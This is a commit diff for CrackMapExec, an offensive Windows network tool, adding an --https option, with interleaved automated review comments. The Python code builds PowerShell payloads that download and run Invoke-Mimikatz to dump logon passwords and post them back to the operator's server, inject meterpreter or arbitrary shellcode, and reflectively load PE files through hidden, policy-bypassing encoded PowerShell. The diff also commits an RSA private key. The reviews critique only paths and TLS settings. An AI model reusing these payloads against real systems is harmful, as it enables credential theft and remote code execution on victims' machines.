Added HTTPS support as per #15
parent
8054b5e655
commit
7d2ba3c63a
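--- /dev/null
+++ b/certs/crackmapexec.crt
@@ -0,0 +1,18 @@
+-----BEGIN CERTIFICATE-----
+MIIC0zCCAbugAwIBAgIJAJoXi7tJgXIQMA0GCSqGSIb3DQEBCwUAMAAwHhcNMTUx
+MDE2MTkwMTE0WhcNMjUxMDEzMTkwMTE0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
+AQ8AMIIBCgKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
+WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
+/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
+RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
+TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
+3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABo1AwTjAdBgNVHQ4EFgQU
+Q7giuO8Hlv/pMqGMLASC8/uW82owHwYDVR0jBBgwFoAUQ7giuO8Hlv/pMqGMLASC
+8/uW82owDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQsFAAOCAQEAGYf7iROqTpkG
+Rl7O7Kf1gwb4LJcsSLSHKqOw76ujOVY4r552ayJLEGhkizXMgE4HuLTAdLFNd+KT
+DyqxCK3GOikx0D/Wl+xgwQWxkNmuOlajDH1aNJp38BS9yFuHm5b8iOWLpgpoHfPU
+9Lj16C3mnXRnKkmXxtg46gB3P1lT1Zv5Nl7o58//D/5/RCoRjZ4m/rfypekszsBZ
+LzWwabf6WKWzwnx9S+tL/pelzMnhjJ83SmpRE0aKGjjw9+COzpnTyDdGSzCXLJM9
+hjuDcReX7yk0o0thkwlu2pY2hA0ZwjAKu0fIZAD9s4QwxqfAnj26ENscd4VJA+Ph
+4lJiTamdpA==
+-----END CERTIFICATE-----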
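--- /dev/null
+++ b/certs/crackmapexec.key
@@ -0,0 +1,27 @@
+-----BEGIN RSA PRIVATE KEY-----
+MIIEowIBAAKCAQEAsIvtOfuJ7TakL8EVH/ku1mXBWnaACfjNdh7ISTlC7oXaRTxe
+WHjGBkmAAWjHIfKRQev0MxFc6PW+GpV5EtAPIN0j3IHyQhNf+4pfNZyBDR6pdPoH
+/d0DonwxZ7chbc+kpbCz3/0pEuZ+cdfqqe2qd7putw55kbGMlInVa0j95C0VSQPv
+RyJa/n8IJZWOHrVX1OzsuZlrBqPoa/ieZaBa4Y2rBvgclVRzw6vmRKFTDCqcARCd
+TfcQ8ga2wD/Cfah4Z6PMT7ZlAHplFZdvCC1bVC077qUpIR4xxn/D/UGSvmQc3ssg
+3pVKGsuqbIb0LLgzMPN4LG2TiHBHpWwS3l4/iwIDAQABAoIBAFtHPVPpNZqr0Z/P
+GHj7gLfgzGNVOUXumWwk5jDVpkFke0GowK7FYr0Fa2VPIwXuQCPxNsTgiUT5KVzd
+Q0fywp+fNldf6D05fzqyhB9X13FNFRgh3dfnWWW9CF4zVNlNrjbscVOxtHbNLTr3
+A6Dv/F8CyRNkLH6jaaeyy+E4T+yUdnZNUNumhXLRGMWUUOWbTlNtoMAoWcF7cPZh
+srBPwaGsH6ePNTzLC4Nve1Zayz8OUtLMcMJk8A85LadImYiYrY3F/2Kvx9IgO9dn
+LPJgFrejI5Wa5AWk9O4d32gduXFW8EkJfKwAXLRqIB1HT7lXESVQiVz6HBde5fNp
+YxwzhEECgYEA4AQSIEnge88MUG3vWSFl5iMR93wK2EiLbQi5W6TbNJzVh62eiFnW
+U9JzGi329FHhlH8A2T8jhShwyaOjG43Vfii+HSofYaxlf2TcEa6FqKvz8GOfgHbN
+QdD+6JEYg5hVELsLI0ML4CMul5/86Wc4pComonFFoiKFSv0443aCJDkCgYEAycDS
+NDi0ywSbJ/eeTPhiAAtHY4CjgHH15Ba9AFAHOkOHBPMH8l66WjgoVhAH85yBhybr
+3e+I+RCBILHyI/N20XWZo9bPiX6C2w4ukEKt8gB8DwFZDkssgHtMtv3Q3P1CBH51
+kwH6MURp0KZ3JYMNTjM9/crYNmk/9SzQSKiDKeMCgYAPjljP4zFyh4s8XpX7Y4VW
++OJ7hCKgqFD+TlfI1GbgfW+aj2Tt5QcsJPYXQE/g4Xq/vB4L+AV4brl+Vx2xgSTt
+MNka31z0hGs78H4TwEHJ178F13UxD47rXh8FeWXxZXeqxMJePX6qnubSYqrGboOR
+atfp+eGzA6Cr92+m5AjfiQKBgHAi1jLkWciFdN+QB9JsM7wmiLVLaJUZwjvWT5J+
+6KV/puofUolqEVXX5MOBAYprsKq3/V1Lp+wXOk472YQV7DKblJu154BaaszqYwMX
+rKrXjhyg+Siyq7d10Lvc81wA/9KTnzHoZXFAvzeTbqHQ53JRlOEc/3OuqDfTgqj/
+0HdVAoGBAKOhnY43mUvJWkBI/HmWK3a4/nm4o90HHmcYZzdFMSPAyYqpRSfMS/9S
++XjbO0ZetdEo+PV7ko5fT8ncw20Jdv8VMA8FMSpQs13AuI3tjv+mABqmXsm0wGYc
+7f/09XL6y42MDF81N2ujSYT4QGJW2t1ipkgOmCQQrjIJdEtOoySF
+-----END RSA PRIVATE KEY-----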
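Review bot: This section commits the server's RSA private key to the repository next to the certificate in the preceding section, so every installation presents the same identity and the key is readable by anyone with access to the repository history; it has to be treated as published and regenerated. The `-0,0` hunk headers show both files are new, so they can still be replaced by a `.gitignore` entry for `certs/crackmapexec.key` and `certs/crackmapexec.crt` plus a one-time run of the generation script added in the next section at install time. A fixed certificate is also a stable fingerprint for the served endpoint, and a fixed key lets anyone holding the repository decrypt RSA-key-exchange sessions to it, which is the opposite of what the `--https` option in this commit suggests it provides.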
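--- /dev/null
+++ b/[script path not shown on page]
@@ -0,0 +1,3 @@
+#!/bin/bash
+openssl genrsa -out crackmapexec.key 2048
+openssl req -new -x509 -days 3650 -key crackmapexec.key -out crackmapexec.crt -subj "/"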
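Review bot: The script writes `crackmapexec.key` and `crackmapexec.crt` into the current directory, while the Python change in this commit loads `certs/crackmapexec.crt` and `certs/crackmapexec.key` relative to the tool's working directory, so the two only line up when the script is run from inside `certs/` and the tool from its parent; a `cd "$(dirname "$0")"` after the shebang, or at least a comment `# run from the certs/ directory: the server loads certs/crackmapexec.{crt,key} relative to its cwd`, would make that explicit. Without `set -e`, a failure in `openssl genrsa` still lets the `openssl req` line run against a missing key, so `set -eu` on line 2 is worth adding. `-subj "/"` produces a certificate with an empty subject and no subject alternative name; that only works because the PowerShell side generated in this commit sets `ServerCertificateValidationCallback = {$true}`, so a comment recording the dependency, e.g. `# empty subject/no SAN: the tool's client side skips certificate validation, so TLS here gives confidentiality only`, belongs here.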
|
@ -38,6 +38,7 @@ import csv
|
||||||
import re
|
import re
|
||||||
import ntpath
|
import ntpath
|
||||||
import socket
|
import socket
|
||||||
|
import ssl
|
||||||
import hashlib
|
import hashlib
|
||||||
import codecs
|
import codecs
|
||||||
import BaseHTTPServer
|
import BaseHTTPServer
|
||||||
|
@ -2686,22 +2687,9 @@ def enum_shares(smb):
|
||||||
|
|
||||||
return permissions
|
return permissions
|
||||||
|
|
||||||
def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurlsa::logonpasswords exit'):
|
def ps_command(command):
|
||||||
|
if args.ssl:
|
||||||
if katz_ip:
|
command = "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};" + command
|
||||||
command = """
|
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Mimikatz.ps1');
|
|
||||||
$creds = Invoke-Mimikatz -Command "{katz_command}";
|
|
||||||
$request = [System.Net.WebRequest]::Create('http://{addr}');
|
|
||||||
$request.Method = "POST";
|
|
||||||
$request.ContentType = "application/x-www-form-urlencoded";
|
|
||||||
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
|
||||||
$request.ContentLength = $bytes.Length;
|
|
||||||
$requestStream = $request.GetRequestStream();
|
|
||||||
$requestStream.Write( $bytes, 0, $bytes.Length );
|
|
||||||
$requestStream.Close();
|
|
||||||
$request.GetResponse();
|
|
||||||
""".format(addr=katz_ip, katz_command=katz_command)
|
|
||||||
|
|
||||||
if args.force_ps32:
|
if args.force_ps32:
|
||||||
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
|
command = 'IEX "$Env:windir\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe -exec bypass -window hidden -noni -nop -encoded {}"'.format(b64encode(command.encode('UTF-16LE')))
|
||||||
|
@ -2712,12 +2700,37 @@ def ps_command(command=None, katz_ip=None, katz_command='privilege::debug sekurl
|
||||||
|
|
||||||
return ps_command
|
return ps_command
|
||||||
|
|
||||||
|
def gen_mimikatz_command(localip, katz_command='privilege::debug sekurlsa::logonpasswords exit'):
|
||||||
|
protocol = 'http'
|
||||||
|
if args.ssl:
|
||||||
|
protocol = 'https'
|
||||||
|
|
||||||
|
command = """
|
||||||
|
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Mimikatz.ps1');
|
||||||
|
$creds = Invoke-Mimikatz -Command "{katz_command}";
|
||||||
|
$request = [System.Net.WebRequest]::Create('{protocol}://{addr}');
|
||||||
|
$request.Method = "POST";
|
||||||
|
$request.ContentType = "application/x-www-form-urlencoded";
|
||||||
|
$bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
|
||||||
|
$request.ContentLength = $bytes.Length;
|
||||||
|
$requestStream = $request.GetRequestStream();
|
||||||
|
$requestStream.Write( $bytes, 0, $bytes.Length );
|
||||||
|
$requestStream.Close();
|
||||||
|
$request.GetResponse();
|
||||||
|
""".format(protocol=protocol, addr=localip, katz_command=katz_command)
|
||||||
|
|
||||||
|
return ps_command(command)
|
||||||
|
|
||||||
def inject_pscommand(localip):
|
def inject_pscommand(localip):
|
||||||
|
protocol = 'http'
|
||||||
|
if args.ssl:
|
||||||
|
protocol = 'https'
|
||||||
|
|
||||||
if args.inject.startswith('met_'):
|
if args.inject.startswith('met_'):
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{}/Invoke-Shellcode.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('{}://{}/Invoke-Shellcode.ps1');
|
||||||
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(localip,
|
Invoke-Shellcode -Force -Payload windows/meterpreter/{} -Lhost {} -Lport {}""".format(protocol,
|
||||||
|
localip,
|
||||||
args.inject[4:],
|
args.inject[4:],
|
||||||
args.met_options[0],
|
args.met_options[0],
|
||||||
args.met_options[1])
|
args.met_options[1])
|
||||||
|
@ -2728,10 +2741,12 @@ def inject_pscommand(localip):
|
||||||
|
|
||||||
elif args.inject == 'shellcode':
|
elif args.inject == 'shellcode':
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-Shellcode.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-Shellcode.ps1');
|
||||||
$WebClient = New-Object System.Net.WebClient;
|
$WebClient = New-Object System.Net.WebClient;
|
||||||
[Byte[]]$bytes = $WebClient.DownloadData('http://{addr}/{shellcode}');
|
[Byte[]]$bytes = $WebClient.DownloadData('{protocol}://{addr}/{shellcode}');
|
||||||
Invoke-Shellcode -Force -Shellcode $bytes""".format(addr=localip, shellcode=args.path.split('/')[-1])
|
Invoke-Shellcode -Force -Shellcode $bytes""".format(protocol=protocol,
|
||||||
|
addr=localip,
|
||||||
|
shellcode=args.path.split('/')[-1])
|
||||||
|
|
||||||
if args.procid:
|
if args.procid:
|
||||||
command += " -ProcessID {}".format(args.procid)
|
command += " -ProcessID {}".format(args.procid)
|
||||||
|
@ -2740,8 +2755,10 @@ def inject_pscommand(localip):
|
||||||
|
|
||||||
elif args.inject == 'exe' or args.inject == 'dll':
|
elif args.inject == 'exe' or args.inject == 'dll':
|
||||||
command = """
|
command = """
|
||||||
IEX (New-Object Net.WebClient).DownloadString('http://{addr}/Invoke-ReflectivePEInjection.ps1');
|
IEX (New-Object Net.WebClient).DownloadString('{protocol}://{addr}/Invoke-ReflectivePEInjection.ps1');
|
||||||
Invoke-ReflectivePEInjection -PEUrl http://{addr}/{pefile}""".format(addr=localip, pefile=args.path.split('/')[-1])
|
Invoke-ReflectivePEInjection -PEUrl {protocol}://{addr}/{pefile}""".format(protocol=protocol,
|
||||||
|
addr=localip,
|
||||||
|
pefile=args.path.split('/')[-1])
|
||||||
|
|
||||||
if args.procid:
|
if args.procid:
|
||||||
command += " -ProcID {}"
|
command += " -ProcID {}"
|
||||||
|
@ -2924,14 +2941,14 @@ def connect(host):
|
||||||
|
|
||||||
if args.mimikatz:
|
if args.mimikatz:
|
||||||
noOutput = True
|
noOutput = True
|
||||||
args.command = ps_command(katz_ip=local_ip)
|
args.command = gen_mimikatz_command(local_ip)
|
||||||
|
|
||||||
if args.mimi_cmd:
|
if args.mimi_cmd:
|
||||||
noOutput = True
|
noOutput = True
|
||||||
args.command = ps_command(katz_ip=local_ip, katz_command=args.mimi_cmd)
|
args.command = gen_mimikatz_command(local_ip, args.mimi_cmd)
|
||||||
|
|
||||||
if args.pscommand:
|
if args.pscommand:
|
||||||
args.command = ps_command(command=args.pscommand)
|
args.command = ps_command(args.pscommand)
|
||||||
|
|
||||||
if args.inject:
|
if args.inject:
|
||||||
noOutput = True
|
noOutput = True
|
||||||
|
@ -3029,6 +3046,7 @@ if __name__ == '__main__':
|
||||||
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)')
|
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default //./root/cimv2)')
|
||||||
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
|
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
|
||||||
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
|
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
|
||||||
|
parser.add_argument("--https", dest='ssl', action='store_true', help='Serve everything over https instead of http')
|
||||||
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
|
parser.add_argument("-v", action='store_true', dest='verbose', help="Enable verbose output")
|
||||||
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
|
parser.add_argument("target", nargs=1, type=str, help="The target range, CIDR identifier or file containing targets")
|
||||||
|
|
||||||
|
@ -3153,18 +3171,23 @@ if __name__ == '__main__':
|
||||||
print_error('Unable to find combo file at specified path')
|
print_error('Unable to find combo file at specified path')
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if args.mimikatz or args.mimi_cmd or args.inject or (args.ntds == 'ninja'):
|
if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
|
||||||
print_status("Press CTRL-C at any time to exit")
|
print_status("Press CTRL-C at any time to exit")
|
||||||
print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
|
print_status('Note: This might take some time on large networks! Go grab a redbull!\n')
|
||||||
|
|
||||||
server = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
|
if args.ssl:
|
||||||
t = Thread(name='HTTPServer', target=server.serve_forever)
|
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 443), MimikatzServer)
|
||||||
|
httpd.socket = ssl.wrap_socket(httpd.socket, certfile='certs/crackmapexec.crt', keyfile='certs/crackmapexec.key', server_side=True)
|
||||||
|
else:
|
||||||
|
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', 80), MimikatzServer)
|
||||||
|
|
||||||
|
t = Thread(name='HTTPServer', target=httpd.serve_forever)
|
||||||
t.setDaemon(True)
|
t.setDaemon(True)
|
||||||
t.start()
|
t.start()
|
||||||
|
|
||||||
concurrency(hosts)
|
concurrency(hosts)
|
||||||
|
|
||||||
if args.mimikatz or args.inject or args.ntds == 'ninja':
|
if args.mimikatz or args.mimi_cmd or args.inject or args.ntds == 'ninja':
|
||||||
try:
|
try:
|
||||||
while True:
|
while True:
|
||||||
sleep(1)
|
sleep(1)
|
||||||
|
|
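Review bot: In the hunk at `@ -3153`, `certfile='certs/crackmapexec.crt'` and `keyfile='certs/crackmapexec.key'` are resolved against the process working directory, so `--https` fails to open the files whenever the tool is launched from anywhere but the repository root; anchor them to the script instead, e.g. `cert_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'certs')` and pass `certfile=os.path.join(cert_dir, 'crackmapexec.crt'), keyfile=os.path.join(cert_dir, 'crackmapexec.key')` (the `os` import is not visible in this diff, so confirm it is present). `ssl.wrap_socket` is called with no `ssl_version` or `ciphers`, so the accepted protocol versions are whatever the interpreter's defaults allow; where `ssl.SSLContext` is available, a context built once with `load_cert_chain` and `wrap_socket(httpd.socket, server_side=True)` pins those choices in one place. The server side also deserves a one-line comment tied to the `@ -2686` hunk, where the generated PowerShell sets `ServerCertificateValidationCallback = {$true}`: `# self-signed cert and clients skip validation: TLS here gives confidentiality only, not server authentication`. Unrelated to this change but still on the new side of the `@ -2740` hunk, `command += " -ProcID {}"` never calls `.format(args.procid)`, so the literal `{}` is emitted; the `-ProcessID` branch in the `@ -2728` hunk shows the intended form. The enclosing `if __name__ == '__main__':` block starts and ends outside the hunk.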